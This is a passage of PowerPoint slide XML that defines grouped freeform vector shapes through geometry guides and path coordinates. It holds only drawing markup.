                      <a:pt x="0" y="22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B7DB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5" name="Freeform 706"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2321" y="4927"/>
                <a:ext cx="168" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 168"/>
                  <a:gd name="T1" fmla="*/ 218 h 218"/>
                  <a:gd name="T2" fmla="*/ 0 w 168"/>
                  <a:gd name="T3" fmla="*/ 45 h 218"/>
                  <a:gd name="T4" fmla="*/ 168 w 168"/>
                  <a:gd name="T5" fmla="*/ 0 h 218"/>
                  <a:gd name="T6" fmla="*/ 168 w 168"/>
                  <a:gd name="T7" fmla="*/ 173 h 218"/>
                  <a:gd name="T8" fmla="*/ 0 w 168"/>
                  <a:gd name="T9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8" h="218">
                    <a:moveTo>
                      <a:pt x="0" y="218"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21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B7DB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6" name="Freeform 707"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1289" y="5445"/>
                <a:ext cx="168" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 168"/>
                  <a:gd name="T1" fmla="*/ 125 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 168"/>
                  <a:gd name="T3" fmla="*/ 45 h 125"/>
                  <a:gd name="T4" fmla="*/ 168 w 168"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 168 w 168"/>
                  <a:gd name="T7" fmla="*/ 80 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 168"/>
                  <a:gd name="T9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8" h="125">
                    <a:moveTo>
                      <a:pt x="0" y="125"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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FFC269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7" name="Freeform 708"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2321" y="5166"/>
                <a:ext cx="168" cy="128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 168"/>
                  <a:gd name="T1" fmla="*/ 128 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 168"/>
                  <a:gd name="T3" fmla="*/ 45 h 128"/>
                  <a:gd name="T4" fmla="*/ 168 w 168"/>
                  <a:gd name="T5" fmla="*/ 0 h 128"/>
                  <a:gd name="T6" fmla="*/ 168 w 168"/>
                  <a:gd name="T7" fmla="*/ 83 h 128"/>
                  <a:gd name="T8" fmla="*/ 0 w 168"/>
                  <a:gd name="T9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8" h="128">
                    <a:moveTo>
                      <a:pt x="0" y="128"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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FFC269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8" name="Freeform 709"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1542" y="4961"/>
                <a:ext cx="678" cy="656"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 678"/>
                  <a:gd name="T1" fmla="*/ 186 h 656"/>
                  <a:gd name="T2" fmla="*/ 0 w 678"/>
                  <a:gd name="T3" fmla="*/ 394 h 656"/>
                  <a:gd name="T4" fmla="*/ 678 w 678"/>
                  <a:gd name="T5" fmla="*/ 212 h 656"/>
                  <a:gd name="T6" fmla="*/ 678 w 678"/>
                  <a:gd name="T7" fmla="*/ 0 h 656"/>
                  <a:gd name="T8" fmla="*/ 0 w 678"/>
                  <a:gd name="T9" fmla="*/ 186 h 656"/>
                  <a:gd name="T10" fmla="*/ 0 w 678"/>
                  <a:gd name="T11" fmla="*/ 656 h 656"/>
                  <a:gd name="T12" fmla="*/ 678 w 678"/>
                  <a:gd name="T13" fmla="*/ 470 h 656"/>
                  <a:gd name="T14" fmla="*/ 678 w 678"/>
                  <a:gd name="T15" fmla="*/ 278 h 656"/>
                  <a:gd name="T16" fmla="*/ 0 w 678"/>
                  <a:gd name="T17" fmla="*/ 460 h 656"/>
                  <a:gd name="T18" fmla="*/ 0 w 678"/>
                  <a:gd name="T19" fmla="*/ 656 h 6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8" h="656">
                    <a:moveTo>
                      <a:pt x="0" y="186"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="186"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="656"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="678" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:ln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9" name="Freeform 710"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1076" y="5372"/>
                <a:ext cx="1491" cy="534"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 630 w 631"/>
                  <a:gd name="T1" fmla="*/ 2 h 226"/>
                  <a:gd name="T2" fmla="*/ 627 w 631"/>
                  <a:gd name="T3" fmla="*/ 0 h 226"/>
                  <a:gd name="T4" fmla="*/ 627 w 631"/>
                  <a:gd name="T5" fmla="*/ 5 h 226"/>
                  <a:gd name="T6" fmla="*/ 434 w 631"/>
                  <a:gd name="T7" fmla="*/ 58 h 226"/>
                  <a:gd name="T8" fmla="*/ 234 w 631"/>
                  <a:gd name="T9" fmla="*/ 115 h 226"/>
                  <a:gd name="T10" fmla="*/ 0 w 631"/>
                  <a:gd name="T11" fmla="*/ 149 h 226"/>
                  <a:gd name="T12" fmla="*/ 0 w 631"/>
                  <a:gd name="T13" fmla="*/ 198 h 226"/>
                  <a:gd name="T14" fmla="*/ 234 w 631"/>
                  <a:gd name="T15" fmla="*/ 165 h 226"/>
                  <a:gd name="T16" fmla="*/ 434 w 631"/>
                  <a:gd name="T17" fmla="*/ 108 h 226"/>
                  <a:gd name="T18" fmla="*/ 610 w 631"/>
                  <a:gd name="T19" fmla="*/ 61 h 226"/>
                  <a:gd name="T20" fmla="*/ 610 w 631"/>
                  <a:gd name="T21" fmla="*/ 61 h 226"/>
                  <a:gd name="T22" fmla="*/ 610 w 631"/>
                  <a:gd name="T23" fmla="*/ 61 h 226"/>
                  <a:gd name="T24" fmla="*/ 627 w 631"/>
                  <a:gd name="T25" fmla="*/ 55 h 226"/>
                  <a:gd name="T26" fmla="*/ 630 w 631"/>
                  <a:gd name="T27" fmla="*/ 51 h 226"/>
                  <a:gd name="T28" fmla="*/ 630 w 631"/>
                  <a:gd name="T29" fmla="*/ 2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31" h="226">
                    <a:moveTo>
                      <a:pt x="630" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="630" y="1"/>
                      <a:pt x="629" y="0"/>
                      <a:pt x="627" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="627" y="5"/>
                      <a:pt x="627" y="5"/>
                      <a:pt x="627" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="604" y="16"/>
                      <a:pt x="492" y="42"/>
                      <a:pt x="434" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="75"/>
                      <a:pt x="289" y="99"/>
                      <a:pt x="234" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="131"/>
                      <a:pt x="39" y="174"/>
                      <a:pt x="0" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="198"/>
                      <a:pt x="0" y="198"/>
                      <a:pt x="0" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="226"/>
                      <a:pt x="178" y="181"/>
                      <a:pt x="234" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="289" y="149"/>
                      <a:pt x="374" y="125"/>
                      <a:pt x="434" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="483" y="94"/>
                      <a:pt x="570" y="74"/>
                      <a:pt x="610" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="610" y="61"/>
                      <a:pt x="610" y="61"/>
                      <a:pt x="610" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="610" y="61"/>
                      <a:pt x="610" y="61"/>
                      <a:pt x="610" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="616" y="59"/>
                      <a:pt x="627" y="55"/>
                      <a:pt x="627" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="629" y="53"/>
                      <a:pt x="631" y="52"/>
                      <a:pt x="630" y="51"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="630" y="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0" name="Freeform 711"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="552" y="4495"/>
                <a:ext cx="165" cy="484"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 165"/>
                  <a:gd name="T1" fmla="*/ 484 h 484"/>
                  <a:gd name="T2" fmla="*/ 0 w 165"/>
                  <a:gd name="T3" fmla="*/ 45 h 484"/>
                  <a:gd name="T4" fmla="*/ 165 w 165"/>
                  <a:gd name="T5" fmla="*/ 0 h 484"/>
                  <a:gd name="T6" fmla="*/ 165 w 165"/>
                  <a:gd name="T7" fmla="*/ 440 h 484"/>
                  <a:gd name="T8" fmla="*/ 0 w 165"/>
                  <a:gd name="T9" fmla="*/ 484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5" h="484">
                    <a:moveTo>
                      <a:pt x="0" y="484"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48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1" name="Freeform 712"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="519" y="4533"/>
                <a:ext cx="33" cy="446"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 7 h 446"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 446"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 439 h 446"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 446 h 446"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 7 h 4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446">
                    <a:moveTo>
                      <a:pt x="33" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="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2" name="Freeform 713"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="519" y="4488"/>
                <a:ext cx="198" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 198 w 198"/>
                  <a:gd name="T1" fmla="*/ 7 h 52"/>
                  <a:gd name="T2" fmla="*/ 168 w 198"/>
                  <a:gd name="T3" fmla="*/ 0 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 198"/>
                  <a:gd name="T5" fmla="*/ 45 h 52"/>
                  <a:gd name="T6" fmla="*/ 33 w 198"/>
                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                  <a:gd name="T8" fmla="*/ 198 w 198"/>
                  <a:gd name="T9" fmla="*/ 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52">
                    <a:moveTo>
                      <a:pt x="198" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="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3" name="Freeform 714"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="746" y="5013"/>
                <a:ext cx="26" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 11"/>
                  <a:gd name="T1" fmla="*/ 11 h 12"/>
                  <a:gd name="T2" fmla="*/ 2 w 11"/>
                  <a:gd name="T3" fmla="*/ 8 h 12"/>
                  <a:gd name="T4" fmla="*/ 2 w 11"/>
                  <a:gd name="T5" fmla="*/ 1 h 12"/>
                  <a:gd name="T6" fmla="*/ 9 w 11"/>
                  <a:gd name="T7" fmla="*/ 3 h 12"/>
                  <a:gd name="T8" fmla="*/ 9 w 11"/>
                  <a:gd name="T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9" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="12"/>
                      <a:pt x="4" y="11"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="6"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="7" y="1"/>
                      <a:pt x="9" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="6"/>
                      <a:pt x="11" y="9"/>
                      <a:pt x="9" y="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4" name="Freeform 715"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="746" y="4332"/>
                <a:ext cx="26" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 11"/>
                  <a:gd name="T1" fmla="*/ 11 h 13"/>
                  <a:gd name="T2" fmla="*/ 2 w 11"/>
                  <a:gd name="T3" fmla="*/ 9 h 13"/>
                  <a:gd name="T4" fmla="*/ 2 w 11"/>
                  <a:gd name="T5" fmla="*/ 1 h 13"/>
                  <a:gd name="T6" fmla="*/ 9 w 11"/>
                  <a:gd name="T7" fmla="*/ 4 h 13"/>
                  <a:gd name="T8" fmla="*/ 9 w 11"/>
                  <a:gd name="T9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9" y="11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2" y="1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5" name="Freeform 716"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="542" y="4339"/>
                <a:ext cx="218" cy="756"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 92"/>
                  <a:gd name="T1" fmla="*/ 24 h 320"/>
                  <a:gd name="T2" fmla="*/ 0 w 92"/>
                  <a:gd name="T3" fmla="*/ 320 h 320"/>
                  <a:gd name="T4" fmla="*/ 92 w 92"/>
                  <a:gd name="T5" fmla="*/ 295 h 320"/>
                  <a:gd name="T6" fmla="*/ 90 w 92"/>
                  <a:gd name="T7" fmla="*/ 287 h 320"/>
                  <a:gd name="T8" fmla="*/ 8 w 92"/>
                  <a:gd name="T9" fmla="*/ 309 h 320"/>
                  <a:gd name="T10" fmla="*/ 8 w 92"/>
                  <a:gd name="T11" fmla="*/ 30 h 320"/>
                  <a:gd name="T12" fmla="*/ 92 w 92"/>
                  <a:gd name="T13" fmla="*/ 7 h 320"/>
                  <a:gd name="T14" fmla="*/ 90 w 92"/>
                  <a:gd name="T15" fmla="*/ 0 h 320"/>
                  <a:gd name="T16" fmla="*/ 0 w 92"/>
                  <a:gd name="T17" fmla="*/ 24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320">
                    <a:moveTo>
                      <a:pt x="0" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="320"/>
                      <a:pt x="0" y="320"/>
                      <a:pt x="0" y="320"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="295"/>
                      <a:pt x="92" y="295"/>
                      <a:pt x="92" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="287"/>
                      <a:pt x="90" y="287"/>
                      <a:pt x="90" y="287"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="287"/>
                      <a:pt x="17" y="307"/>
                      <a:pt x="8" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="299"/>
                      <a:pt x="8" y="36"/>
                      <a:pt x="8" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="29"/>
                      <a:pt x="92" y="7"/>
                      <a:pt x="92" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="0"/>
                      <a:pt x="90" y="0"/>
                      <a:pt x="90" y="0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6" name="Freeform 717"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1476" y="4091"/>
                <a:ext cx="236" cy="787"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 236 w 236"/>
                  <a:gd name="T1" fmla="*/ 787 h 787"/>
                  <a:gd name="T2" fmla="*/ 0 w 236"/>
                  <a:gd name="T3" fmla="*/ 0 h 787"/>
                  <a:gd name="T4" fmla="*/ 236 w 236"/>
                  <a:gd name="T5" fmla="*/ 787 h 7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6" h="787">
                    <a:moveTo>
                      <a:pt x="236" y="787"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="78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7" name="Line 718"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1476" y="4091"/>
                <a:ext cx="236" cy="78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858" name="Group 641"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="9447288" y="3749223"/>
              <a:ext cx="909637" cy="263525"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="859" name="Freeform 642"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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0" name="Freeform 643"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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1" name="Freeform 644"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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2" name="Freeform 645"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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3" name="Freeform 646"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603"/>
                    </a:ln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969696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4" name="Freeform 647"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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865" name="Group 883"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6842760" y="1230288"/>
              <a:ext cx="286151" cy="599554"/>
              <a:chOff x="4142" y="1875"/>
              <a:chExt cx="147" cy="308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="866" name="Group 874"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4200" y="1924"/>
                <a:ext cx="89" cy="70"/>
                <a:chOff x="762" y="1205"/>
                <a:chExt cx="904" cy="712"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="876" name="Freeform 875"/>
                <p:cNvSpPr>
                  <a:spLocks/>
